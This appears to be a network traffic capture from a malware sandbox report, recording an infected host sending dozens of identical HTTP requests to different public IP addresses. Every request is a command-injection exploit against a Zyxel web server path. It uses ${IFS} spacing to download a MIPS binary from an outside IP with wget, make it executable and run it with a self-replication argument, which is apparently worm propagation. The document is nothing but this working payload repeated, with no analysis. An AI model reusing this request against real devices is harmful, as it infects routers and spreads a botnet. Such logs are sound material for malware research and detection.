                                                        Feb 2, 2024 06:21:02.785932064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2594192.168.2.1444152184.108.130.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.785974026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2595192.168.2.1441694178.220.236.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786021948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2596192.168.2.14491669.73.192.146443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786055088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2597192.168.2.144272253.1.30.180443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786081076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2598192.168.2.1434116174.71.12.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786124945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2599192.168.2.143620241.121.126.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786161900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2600192.168.2.1450822217.27.49.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786212921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2601192.168.2.1458016154.135.183.94443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786266088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2602192.168.2.1449534170.28.155.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786307096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2603192.168.2.1453438218.166.38.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786331892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2604192.168.2.144695685.31.0.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786362886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2605192.168.2.143546419.250.156.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786408901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2606192.168.2.1438598168.133.0.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786439896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2607192.168.2.1445688203.90.58.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786463976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2608192.168.2.145681820.243.115.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786503077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2609192.168.2.1453752114.40.109.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786556005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2610192.168.2.143866236.70.238.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786581039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2611192.168.2.143411295.25.252.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786634922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2612192.168.2.1437258139.88.158.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786667109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2613192.168.2.1444622136.205.56.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786706924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2614192.168.2.1438154193.216.44.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786731005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2615192.168.2.1432886145.2.47.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786772966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2616192.168.2.144180284.164.154.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786804914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2617192.168.2.1436282156.18.60.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786864996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2618192.168.2.1459566182.132.81.97443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786902905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2619192.168.2.1443358199.165.130.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786943913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2620192.168.2.144259836.206.109.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.786983013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2621192.168.2.1437670105.255.23.112443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787024021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2622192.168.2.144961479.131.70.35443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787066936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2623192.168.2.146094459.147.110.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787098885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2624192.168.2.1446012128.148.116.141443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787164927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2625192.168.2.145908645.233.182.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787180901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2626192.168.2.143850677.215.192.222443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787233114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2627192.168.2.1451494128.80.98.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787281036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2628192.168.2.143324488.44.132.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787333965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2629192.168.2.1460832190.105.173.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787373066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2630192.168.2.145816048.118.137.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787396908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2631192.168.2.1449778101.89.43.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787457943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2632192.168.2.1458320160.29.196.27443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787508965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2633192.168.2.144469897.28.100.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787517071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2634192.168.2.14465288.2.78.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787658930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2635192.168.2.1455128120.176.189.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787700891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2636192.168.2.145864458.18.7.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787749052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2637192.168.2.1450038130.175.114.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787790060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2638192.168.2.1459276125.91.20.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787811995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2639192.168.2.143429863.199.148.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787841082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2640192.168.2.143749213.73.86.217443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787894964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2641192.168.2.1434754182.5.141.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.787945032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2642192.168.2.1460612148.246.202.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788006067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2643192.168.2.1454358166.134.91.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788050890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2644192.168.2.145969668.19.55.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788089037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2645192.168.2.14457262.196.134.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788124084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2646192.168.2.1436606135.169.179.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788161993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2647192.168.2.1449848142.179.210.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788197041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2648192.168.2.1455690179.169.123.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788245916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2649192.168.2.1437264169.117.130.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788274050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2650192.168.2.144482866.174.112.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788300037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2651192.168.2.1445808223.36.138.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788342953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2652192.168.2.144278289.80.197.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788377047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2653192.168.2.1444520202.24.153.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788422108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2654192.168.2.143730486.164.231.116443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788467884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2655192.168.2.1452116110.210.219.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:02.788490057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2656192.168.2.1444606170.155.222.125443
                                                        TimestampBytes transferredDirectionData
